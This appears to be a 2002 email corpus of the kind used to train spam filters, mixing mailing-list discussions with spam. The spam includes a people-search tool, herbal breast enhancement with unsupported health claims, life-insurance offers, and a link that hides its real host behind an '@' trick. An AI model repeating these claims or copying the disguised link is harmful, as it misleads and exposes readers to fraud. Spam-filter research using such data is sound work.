 border="0" cellpadding="5" cellspacing="0" width="491"&gt;     &lt;tr&gt;      &lt;td
 width="459"&gt;                     &lt;a
 href="http://r.vresp.com/?A/d273447b0d/37447/aa3b97bcc2"&gt;           
          &lt;img src="http://209.126.159.62/truth.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;  
    &lt;td width="12"&gt;&lt;/td&gt;     &lt;/tr&gt;     &lt;tr height="32"&gt;      &lt;td
 width="459" valign="bottom" align="left" height="32"&gt;&lt;spacer
 type="block"&gt;&lt;/td&gt;      &lt;td valign="bottom" align="left" width="12"
 height="32"&gt;&lt;/td&gt;     &lt;/tr&gt;     &lt;tr&gt;      &lt;td width="459" valign="top"
 align="left"&gt;       &lt;hr&gt;       &lt;b&gt;&lt;font
 face="Verdana,Arial,Helvetica,Geneva,Swiss,SunSans-Regular"
 color="#aa0000" size="3"&gt;&lt;i&gt;FIND OUT THE TRUTH ABOUT ANYONE.&lt;/i&gt;&lt;br&gt;      
  &lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana,Arial,Helvetica,Geneva,Swiss,SunSans-Regular"
 size="2"&gt;&lt;b&gt;NOW&lt;/b&gt; you can do background investigations of your
 neighbors, employees, friends and neighbors, using YOUR COMPUTER AT HOME
 OR WORK!&lt;br&gt;        &lt;br&gt;        &lt;b&gt;To find out more click here now!&lt;br&gt;   
     &lt;/b&gt;&lt;/font&gt;&lt;font
 face="Verdana,Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;br&gt;       
 &lt;hr&gt;       &lt;/font&gt;&lt;font color="#aa0000"
 face="Verdana,Arial,Helvetica,Geneva,Swiss,SunSans-Regular"
 size="3"&gt;&lt;b&gt;&lt;i&gt;It's FAST, its EASY and its FUN.&lt;br&gt;        
 &lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="2"
 face="Verdana,Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;b&gt;NET
 DETECTIVE 7.0&lt;/b&gt; is an amazing new tool that allows you to dig up facts
 about anyone. It is all completely legal, and you can use it in the
 privacy of your own home without anyone ever knowing. It's cheaper and
 faster than hiring a private investigator.&lt;br&gt;        &lt;br&gt;        &lt;b&gt;To
 find out more click here&lt;br&gt;        &lt;/b&gt;&lt;/font&gt;&lt;font
 face="Verdana,Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;br&gt;       
 &lt;hr&gt;       &lt;/font&gt;&lt;font
 face="Verdana,Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"
 color="#aa0000"&gt;&lt;b&gt;NET DETECTIVE 7.0&lt;/b&gt; is endorsed by the National
 Association of IndependentPrivate Investigators (NAIPI)&lt;/font&gt;&lt;/td&gt;     
 &lt;td valign="top" align="left" width="12"&gt;&lt;/td&gt;     &lt;/tr&gt;    &lt;/table&gt;  
 &lt;/div&gt;   &lt;p&gt;&lt;/p&gt;  &lt;/body&gt;  &lt;/html&gt;
 &lt;br&gt;
                      &lt;hr color=e0e0e0&gt;
                      &lt;table border=0 cellpadding=5 cellspacing=0
 width=100%&gt;
                      &lt;tr&gt;
                            &lt;td&gt;&lt;font face="arial,verdana" size=1&gt;You have
 signed up with one of our network partners to receive email providing you
 with special offers that may appeal to you. If you do not wish to receive
 these offers in the future, reply to this email with "unsubscribe" in the
 subject or simply click on the following link:  &lt;a
 href="http://unsubscribe.verticalresponse.com/u.html?968af93806/aa3b97bcc2"&gt;Unsubscribe&lt;/a&gt;&lt;/td&gt;
                      &lt;/tr&gt;
                      &lt;/table&gt;
 &lt;img src=http://i.verticalresponse.com/blank.gif?968af93806/aa3b97bcc2&gt;
 --__________MIMEboundary__________--
 .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</si>
  <si>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On Mon, 2002-08-26 at 11:41, Mike Masnick wrote:
 &gt; 
 &gt; In which world are we talking about?  That may be true for the first sale, 
 &gt; but once something is out in the world, the "creator" loses control... If I 
 &gt; buy a chair you built, and then decide to give it away to my neighbor, by 
 &gt; you're definition, he just stole from you.
 There are specific statutory exemptions to the "first sale" principle of
 fair use in the US.  For example, audio recordings have such an
 exemption (dating from the early '80s IIRC), which is why you can't
 (legally) be in the business of renting audio CDs; the creators can
 control what you do with it after they've sold it to you.  Certain
 industries would like to extend similar exemptions to other products --
 there is no theoretical limit to what Congress could revoke such
 privileges on.
 &gt; Access to free stuff often helps to sell other stuff.  Just because you 
 &gt; (and the entertainment industry, it seems) can't be creative enough to come 
 &gt; up with a business model to leverage free stuff into paid stuff... don't 
 &gt; take it out on the rest of us.
 The problem with the entertainment industry is that they engage in
 business and pricing tactics that make anything Microsoft was ever
 accused of pale in comparison.  If they can't figure out how to make
 money doing something, they'll actually burn money to make sure no
 "industry outsider" can either for all intents and purposes; control is
 more important than maximizing profit as long as they can make a
 profit.  They don't need your carrot, so they only engage in reasonable
 business behavior when you are carrying a very large stick, and few
 people swing a stick large enough.  They are being chronically
 "investigated" by the DoJ for anti-trust, collusion, and similar
 activities, but that is mostly just for show.
 Which isn't to say that the entertainment industry won't fall victim to
 its own stupidity, but their ability to do arbitrary and capricious
 price manipulation with impunity is going to make it a slow decline.
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Natural Breast Enhancement
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;body bgcolor=#FFFFFF&gt;
 &lt;font color=#ff00ff&gt;LIMITED Time OFFER!! &lt;BR&gt;
 &lt;/font&gt;
 &lt;font color=#ff0066&gt;
 Quick Perfection Breast Enhancement is proud to offer to you&lt;BR&gt;
  a safe natural choice to breast enhancement (augmentation) surgery.  &lt;BR&gt;
 With such frequent problems as scarring, leaking, un-natural appearance, &lt;BR&gt;
 loss of nipple area sensitivity, not to mention the physical pain of the &lt;BR&gt;
 procedure &amp; final cost, women are seeking and finding alternative methods of &lt;BR&gt;
 safe natural breast enhancement.   
 &lt;/FONT&gt;
 &lt;font color=#009933&gt;
 &lt;A HREF=http://bustenhancer.co.ukgoodreaper.com@terra.es/personal9/trew07/index5.htm&gt;
 Click 
 here to learn more:&lt;/a&gt;&lt;BR&gt;
 &lt;font color=#9900ff&gt;
 After many years of medical research and studies, it is now quick, &lt;BR&gt;
 easy, safe, and virtually inexpensive for you to permanently achieve &lt;BR&gt;
 the breast size that you've always wanted! Bigger, firmer breasts That Look and feel all Natural!&lt;BR&gt;
 &lt;font color=#ff11gg&gt;
 This advanced high quality breast enhancement herbal formula has no &lt;BR&gt;
 known negative side effects and will stimulate breast growth quickly- while &lt;BR&gt;
 firming and tightening. Regardless of your age, size, race, or &lt;BR&gt;
 physical condition, you will see amazing results!
 &lt;BR&gt;
 &lt;A HREF=http://bustenhancer.co.ukgoodreaper.com@terra.es/personal9/trew07/index5.htm&gt;
 Click here to learn more Information&lt;/a&gt;&lt;BR&gt;
  and read What Major News Organisations Are Saying About &lt;BR&gt;
 Quick Perfection Breast Enhancement&lt;BR&gt;
 &lt;/FONT&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 [W170P118O82W108P95M91C72D77K75X94L82V87T87T89U89U89D72K75]
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt; One effect of getting rid of MINCOUNT is that it latches on more
 &gt; strongly to rare clues now, and those can be unique to the corpus
 &gt; trained on (e.g., one trained ham says "gryndlplyx!", and a followup
 &gt; new ham quotes it).
 This may be a systematic bias in the testing procedure:  in real life, msgs
 come ordered in time.  Say there's a thread that spans N messages on c.l.py.
 In our testing setup, we'll train on a random sampling throughout its whole
 lifetime, and test likewise.  New ham "in the middle" of this thread gets
 benefit from that we trained on msgs that appeared both before and *after*
 it in real life.  It's quite plausible that the f-p rate would rise without
 this effect; in real life, at any given time some number of ham threads will
 just be starting their lives, and if they're at all unusual the trained data
 will know little to nothing about them.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: liberal defnitions
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Yes, it is.  You just want to be called a liberal when you really
 aren't.
 &gt; -----Original Message-----
 &gt; From: Geege Schuman [mailto:geege@barrera.org]
 &gt; Sent: Tuesday, September 24, 2002 5:12 AM
 &gt; To: johnhall@evergo.net; FoRK
 &gt; Subject: RE: liberal defnitions
 &gt; 
 &gt; per john hall:
 &gt; "The opinion that EITHER we are spending too much OR we have too much
 &gt; regulation is pretty
 &gt; much anathema to liberal politics."
 &gt; 
 &gt; no it's not.
 &gt; 
 &gt; geege
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Re: What's wrong with the Razor servers now?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --J2SCkAp4GZ/dPZZf
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 On Thu, Aug 15, 2002 at 10:37:37AM -0700, Brian May wrote:
 # Isn't eBays trust the feedback?
 Sure, but one can surmise that the "Star Rating" or feedback isn't an
 exact correlation to their internal metrics.
 --jordan
 --J2SCkAp4GZ/dPZZf
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9W/ZUpwQdAVEbU7oRAoa3AKCobztB2JiVbwsXV50ydjdLgEtiSwCgtG+f
 Yvz2asms9q5vpwEZJZxR7bk=
 =DJsq
 -----END PGP SIGNATURE-----
 --J2SCkAp4GZ/dPZZf--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</si>
  <si>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Once upon a time, Chris wrote :
 &gt; On Tue, 2002-09-10 at 12:39, Matthias Saou wrote:
 &gt; &gt; Hi all,
 &gt; &gt; 
 &gt; &gt; I'll be leaving this evening until next Monday, with no access to
 &gt; &gt; whatsoever to a single computer until then, woohoo, real holidays! :-)
 &gt; 
 &gt; I don't think I could take it. The network was down for an hour here and
 &gt; I was climbing the walls. :)
 I can't stand it either when it's at work or home and I'd planned on doing
 something that required network access... but I really feel like I need a
 break now, away from work pressure that almost drove me nuts all summer!
 Ah, the joys of responsibilities... :-/
 Six days without computers ahead, but six days driving my 600 Bandit
 roadster bike! I won't be miserable nor get bored, don't worry for me ;-)
 I also have the first Lord of the Rings book to finish (half way through
 now) and the two others to read... lots of "sane" and non-wired occupations
 ahead!
 Oh, did I mention beer drinking with friends? :-))))
 Matthias (really happy to be on holidayyyy for the first time this year!)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</si>
  <si>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[ILUG] dial-on-demand
</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please help me how to set up a dial-on-demand, what are the
 packages needed,
 and other requirements to get on.
 Do you know a site that has a how to and the package where to get it.
 Please help me please for this was my assignment.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?=A6n=C5=A5=A3x=AD=B5=BC=D6=B0e=B5=B9=A7A?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_xxt9w9r4F3OfnfRj5A6nlx
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_xxt9w9r4F3OfnfRj5A6nlxAA"
 ------=_NextPart_xxt9w9r4F3OfnfRj5A6nlxAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29u
 dGVudD0iemgtdHciPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0
 ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFUT1IiIGNvbnRlbnQ9
 Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4wIj4NCjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVudD0i
 RnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+pL2qqbxzp2mrSL1kqNI8L3RpdGxl
 Pg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0KPHAgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1i
 b3R0b206IDAiPjxmb250IGNvbG9yPSIjODA4MDgwIj6zb6xPqWWwVaXRsU23frxzp2mkvaVxpU61
 b6TFqr2xtaZeq0i1TKprsbWmrCAgICAgDQrL5yB+ICE8L2ZvbnQ+PC9wPiAgICANCg0KPGhyIHNp
 emU9IjEiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj4NCiAgPGNlbnRlcj4NCiAgPHRhYmxlIGJvcmRl
 cj0iMCIgd2lkdGg9IjYwNiIgaGVpZ2h0PSIzNjUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGlu
 Zz0iMCIgc3R5bGU9ImJvcmRlcjogMiBkb3R0ZWQgI0ZGOTkzMyI+DQogICAgPHRyPg0KICAgICAg
 PHRkIHdpZHRoPSI2MDAiIGhlaWdodD0iMzY1IiB2YWxpZ249Im1pZGRsZSIgYWxpZ249ImNlbnRl
 ciIgYmdjb2xvcj0iI0U2RkZGMiI+PGZvbnQgc2l6ZT0iNCI+PGI+PGZvbnQgY29sb3I9IiMwMDgw
 ODAiPrRNp+TCvaitvve3fLbcoUg8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDAwMDAiPqazuGfA2cCj
 pE+23KFIoUg8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwMDAiPrdRvtams6bbpHaquqjGt3623KFI
 oUihSDwvZm9udD48L2I+PC9mb250Pg0KICAgICAgICA8cD4mbmJzcDs8Yj48Zm9udCBjb2xvcj0i
 I2ZmMDBmZiIgc2l6ZT0iNyI+p088L2ZvbnQ+PGZvbnQgY29sb3I9IiNmZjAwMDAiIHNpemU9IjYi
 PsNousOhSaFJp0u2T711pFe8dqT5pd+nWbHQp0GmcKbzsLWo7KzdwLSkRrROr+A8L2ZvbnQ+PGZv
 bnQgY29sb3I9IiNmZjY2MDAiIHNpemU9IjciPqfvxdynQaq6pEClzTwvZm9udD48L2I+PC9wPg0K
 ICAgICAgICA8cD48Zm9udCBzaXplPSI1Ij4mbmJzcDs8L2ZvbnQ+PGEgaHJlZj0iaHR0cDovL2Rp
 bW9uLmg4aC5jb20udHcvIj48Yj48dT48c3BhbiBzdHlsZT0iQkFDS0dST1VORC1DT0xPUjogIzAw
 MDBmZiI+PGZvbnQgY29sb3I9IiNmZmZmMDAiIHNpemU9IjUiPr11pFe8dqT5PC9mb250Pjwvc3Bh
 bj48L3U+PC9iPjwvYT48L3A+DQogICAgICAgIDxwPqFAPC90ZD4NCiAgICA8L3RyPg0KICA8L3Rh
 YmxlPg0KICA8L2NlbnRlcj4NCjwvZGl2Pg0KPGhyIHNpemU9IjEiPg0KPHAgYWxpZ249ImNlbnRl
 ciIgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPjxmb250IGNvbG9yPSIj
 RkYwMDAwIj6mcKazpbTCWr3QqKO9zKFBpKO3UaZBpqyo7Ka5q0i90Kv2Jm5ic3A7ICAgDQotJmd0
 OyZuYnNwOyAoPGEgaHJlZj0iaHR0cDovL3gtbWFpbC5oOGguY29tLnR3IiB0YXJnZXQ9Il9ibGFu
 ayI+qdqmrLxzp2k8L2E+KTwvZm9udD48L3A+IA0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=
 ------=_NextPart_xxt9w9r4F3OfnfRj5A6nlxAA--
 ------=_NextPart_xxt9w9r4F3OfnfRj5A6nlx--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Do NOT Drop your Life Insurance
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear ilug@linux.ie 
 Life Partners are life insurance appraisers that appraise all types of life insurance policies, allowing people to access their life insurance cash now rather than later. We help individuals unlock cash from unutilized assets. 
 Individuals usually age 65 or older who find that their health, financial and/or estate planning needs have changed are typical candidates. We have had some candidates advised by financial planners to drop their life insurance policies so they could invest their money in a vehicle that will make them a return now. DO NOT drop your policy as it may be worth CASH to you NOW.
 Why do people sell their policies? 
 The reasons individuals make the decision to sell their life insurance policies are as varied as the people themselves. Some reasons may be to:
 Pay off debts 
 Fund long term care insurance cost 
 Eliminate costly premiums 
 Take advantage of other financial opportunities 
 Make charitable contributions 
 Help family members 
 Life Partners Living Solutions 
 Traditionally, life insurance provides benefits only after death. With Life Partners, it can provide cash benefits for LIFE! 
 Life Partners Objectives 
 Provide market appraisal for life insurance policy owners 
 Provide bids for qualified policies 
 Provide lump sum cash payments to qualified owners 
 Eliminate costly premium payments  
 Contact us now for a FREE appraisal of your life insurance policy.  REMEMBER THIS IS A FREE SERVICE AND THERE IS NO COST TO YOU !!
 1-866-686-LIFE 
 1-866-686-5433  or  e-mail us at llhjr55@yahoo.com with your Name and telephone number and we will have one of our team members contact you ASAP. 
 If you would like to be removed please send 'remove' to llhjr55@yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] mini-itx
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-10-08 at 14:13, John Moylan wrote:
 &gt; Hmm, speaking of cheap machines etc, has anyone tried this sort of 
 &gt; thing: http://www.mini-itx.com/projects/humidor64/ ? or more importantly 
 &gt; has anyone had any positive/negative experiences with the Via mini-itx 
 &gt; boards/via c3 processors.
 &gt; I recall a thread last year about building a custom MP3/CD/Game/vcd 
 &gt; recorder machine, these systems seem to hit the mark. Also, I need to 
 &gt; build a new box, and I was thinking about something that would be as 
 &gt; unobtrusive as possible in my living room;)
 &gt; 
 &gt; John
 The forums there are very informative, and there is also more info on
 using linux on the mini ITX boards at http://linitx.org/.
 A couple of the autopc projects make interesting reading in this regard:
 http://thisstrife.com/ but most of them seem to use windows for some
 unknown reason.....
 HTH
 Phil 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Join the Web's Fastest Growing Singles Community 11.67
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Fight The Risk of Cancer!
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Join the Web's Fastest Growing Singles Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 5) Start Your Private Photo Album Online!
 http://www.adclick.ws/p.cfm?o=283&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?ilug@linux.ie%7C17%7C114258
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Critical breast cancer gene identified
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8664946,1440/
 Date: Not supplied
 Damaged forms of the newly identified gene are implicated in many breast and 
 lung cancers - new treatments for thousands may result
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Two questions
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Doug wrote :
 &gt; Maybe I'm just blind, but I've been poking through the
 &gt; archives of this list trying to find 1) what
 &gt; up-to-date KDE3 repositories are available and 2)
 &gt; where all the Xine skins went.
 For that n2, it's simple : They've been pulled out from the upstream xine
 source. I guess I should make a "xine-skins" package if there is enough
 demand for it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</si>
  <si>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RE: Bush blew take two
</t>
  </si>
  <si>
    <t xml:space="preserve">yeshterday we f*cked up our gubernatorial election, too.  results to be
 contested by reno.  same six districts that were sued in 2000 still came up
 gimpy.
 i suggested to jeb via e-mail we hold a run-off pinata party.  hoist up a
 papier mache donkey and a papier mache elephant.  first one to batted open
 wins.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 Sent: Wednesday, September 11, 2002 9:16 PM
 To: fork@example.com
 Subject: Bush blew take two
 http://www.washingtonpost.com/wp-dyn/articles/A63543-2002Sep10.html
 "MIAMI, Sept. 10 -- A two-gram rock of crack
 cocaine was found inside the shoe of Florida
 Gov. Jeb Bush's 25-year-old daughter by workers
 at the central Florida rehabilitation center
 where she is undergoing court-ordered drug
 treatment, Orlando police said today.
 Noelle Bush was not arrested because witnesses
 would not give sworn statements, but the
 incident is under investigation, according to
 Orlando police spokesman Orlando Rolon."
 Wow, the witnesses would not nark of a Bush girl in an era where there are
 no mare restrictions on being held without a cause?
 Imagine that...
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, Joseph S. Barrera III wrote:
 --]And, having realized that, a lot of them are now having babies.
 --]I can't believe the number of friends at work who are now pregnant
 --]or have already just had their babies.
 We hope that in the next generation we can bring back what we once thought
 of as our future, or more aptly thier future will be a shade better than
 what ours is turning out to be.
 I cant help but appologise to my wifes bulging middle in these last few
 dyas of the pregancy. I wanted so much more for him. My daughter and I
 talk about this in the ways an 8 year old can with a 39 year old. She
 realizes things are not all they could have been, but shes sort of ready
 for the challange. She told me the other day she would get to the moon if
 I dont. Gota love kids, they say the coolest things at just the right
 times.
 As for profit and the drive towars it...moeny is simply a tool,simply one
 way of many to facilitate living the life you want. Too many have taken
 the tool for the goal, the race for the prize and the notion that first is
 all.
 Yea yea, this sad burlesque.
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] replacement xircom dongle?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Anyone know where in Ireland I can get a replacement external dongle
 &gt; for a Xircom CE3B-100 PCMCIA NIC?
 &gt;
 &gt; Failing that, who delivers fastest to Ireland?
 &gt;
 &gt; Regards,
 &gt;
 &gt; Vin
 I went into Maplin looking for exactly this sort of thing, only to be told I
 would have to by a whole new card.....
 Buy &amp; Sell I'd say else just by a new NIC...(which I didn't do) I just live
 with the fact I have to angle the CAT 5 at a certain angle to my NIC or the
 dongle will fall out!
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: from heaven xB8COL5jqAf1adREAm
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_BD64YauT129KiRyjtaWSq5xSFVObB
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_BD64YauT129KiRyjtaWSq5xSFVObBAA"
 ------=_NextPart_BD64YauT129KiRyjtaWSq5xSFVObBAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGEgaHJlZj1odHRwOi8vaGxjLm5vLWlwLm9yZz4NCjxpbWcgc3JjPWh0dHA6Ly9ncm91cHMueWFo
 b28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9zbWFsbF9hMi5naWYgYWx0PWh0dHA6Ly9n
 cm91cHMueWFob28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9zbWFsbF9hMi5naWY+DQo8
 L2E+DQoNCjxhIGhyZWY9aHR0cHM6Ly9oYXBweS5yZWRpcmVjdG1lLm5ldC8+DQo8aW1nIHNyYz1o
 dHRwOi8vZ3JvdXBzLnlhaG9vLmNvbS9ncm91cC94aW54aW5yZW4vZmlsZXMvd2hfc21hbGxfYi5n
 aWYgYWx0PWh0dHA6Ly9ncm91cHMueWFob28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9z
 bWFsbF9iLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwOi8vZm9yZXZlcnNwLmhvcHRvLm9yZy96
 aXJlYWw+DQo8aW1nIHNyYz1odHRwOi8vZ3JvdXBzLnlhaG9vLmNvbS9ncm91cC96aGVuc2hpMDEv
 ZmlsZXMvd29ybGRrbm93LmpwZyBhbHQ9aHR0cDovL2dyb3Vwcy55YWhvby5jb20vZ3JvdXAvemhl
 bnNoaTAxL2ZpbGVzL3dvcmxka25vdy5qcGc+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cDovL3d3dy54
 Y2VscjguY29tL3ZpZGVvL2hjX3ZpZGVvLmh0bT4NCjxpbWcgc3JjPWh0dHA6Ly93d3cuYW5nZWxm
 aXJlLmNvbS84MHMvcGljOS94dWVhbi5naWYgYWx0PWh0dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84
 MHMvcGljOS94dWVhbi5naWY+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cDovL3JvY2lvNjMuaG9wdG8u
 b3JnL2ZsYXNoPg0KPGltZyBzcmM9aHR0cDovL3d3dy5hbmdlbGZpcmUuY29tLzgwcy9waWM5L2Fs
 bGFjY2VwdC5naWYgYWx0PWh0dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84MHMvcGljOS9hbGxhY2Nl
 cHQuZ2lmPg0KPC9hPg0KDQo8YSBocmVmPWh0dHA6Ly9leGFtLmhvcHRvLm9yZy9zZWU+DQo8aW1n
 IHNyYz1odHRwOi8vd3d3LmFuZ2VsZmlyZS5jb20vODBzL3BpYzkvc2hvdWppZS5qcGcgYWx0PWh0
 dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84MHMvcGljOS9zaG91amllLmpwZz4NCjwvYT4NCg0KPGEg
 aHJlZj1odHRwczovL3RpYW5kaS5zeXRlcy5uZXQ+DQo8aW1nIHNyYz1odHRwOi8vd3d3LmFuZ2Vs
 ZmlyZS5jb20vODBzL3BpYzkvdGFpd2FuLmdpZiBhbHQ9aHR0cDovL3d3dy5hbmdlbGZpcmUuY29t
 Lzgwcy9waWM5L3RhaXdhbi5naWY+DQo8L2E+
 ------=_NextPart_BD64YauT129KiRyjtaWSq5xSFVObBAA--
 ------=_NextPart_BD64YauT129KiRyjtaWSq5xSFVObB--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: apt 0.5.7 on RH 7.x
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.
 Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; repository... and there's where the problem will be : It will say that
 &gt; there are two synaptic-0.24-fr1 packages (one installed, the other
 &gt; available) with the same version but different dependencies :-/
 &gt; That's why I always keep package versions lower for older distributions.
 Ah, now I see. This is a non-issue here, so I'll rebuild locally :)
 -- 
 Dog for sale: eats anything and is fond of children.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin spamassassin.raw,1.68.2.12,1.68.2.13
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin
 In directory usw-pr-cvs1:/tmp/cvs-serv4019
 Modified Files:
       Tag: b2_4_0
 	spamassassin.raw 
 Log Message:
 fixed bug 1033: -R and -W were not respecting auto_whitelist_path
 Index: spamassassin.raw
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/spamassassin.raw,v
 retrieving revision 1.68.2.12
 retrieving revision 1.68.2.13
 diff -b -w -u -d -r1.68.2.12 -r1.68.2.13
 --- spamassassin.raw	24 Sep 2002 18:51:37 -0000	1.68.2.12
 +++ spamassassin.raw	2 Oct 2002 13:19:28 -0000	1.68.2.13
 @@ -216,6 +216,9 @@
    if ($@) { warn $@; }
    if ($doing_whitelist_operation) {
 +    # read the config!
 +    $spamtest-&gt;init (1);
 +
      if ($opt{'add-to-whitelist'}) {
        $spamtest-&gt;add_all_addresses_to_whitelist ($mail);
      } elsif ($opt{'remove-from-whitelist'}) {
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Conversations From GDC Europe: Bill Fulton, Zeno Colaco, Harvey Smith
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613664,159/
 Date: 2002-10-06T18:12:56+01:00
 In the second of our series from the GDC Europe, we talk with Microsoft's Bill 
 Fulton about usability testing for games, SCEE's Zeno Colaco about pitching 
 publishers, and Harvey Smith of Ion Storm about emergent game design.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] Debianized Packages for SA 2.3+
</t>
  </si>
  <si>
    <t xml:space="preserve">I successfully installed spamassassin &amp; razor to run system wide on my
 Debian Woody server.  
 Briefly I 
 apt-get installed spamassassin razor and libmilter-dev,
 downloaded spamass-milter-0.1.2.tar.gz from http://www.milter.org,
 ungzipped and untarred the file into /etc/mail, 
 followed the directions in /etc/mail/spamass-milter-0.1.2/README to
 compile the milter, install the rc scripts, and edit and update
 sendmail.mc
 changed /etc/default/spamassassin to set spamassassin to daemon mode.
 verified that spamassassin was running by tailing /var/log/mail.log
 Woody/stable has SA 2.20
 Woody/unstable has SA 2.41
 I'm running the stable source live right now and it is working very
 well.
 If you want unstable change /etc/apt/sources.list, substituting
 "unstable" for "stable",
 Run apt-get update
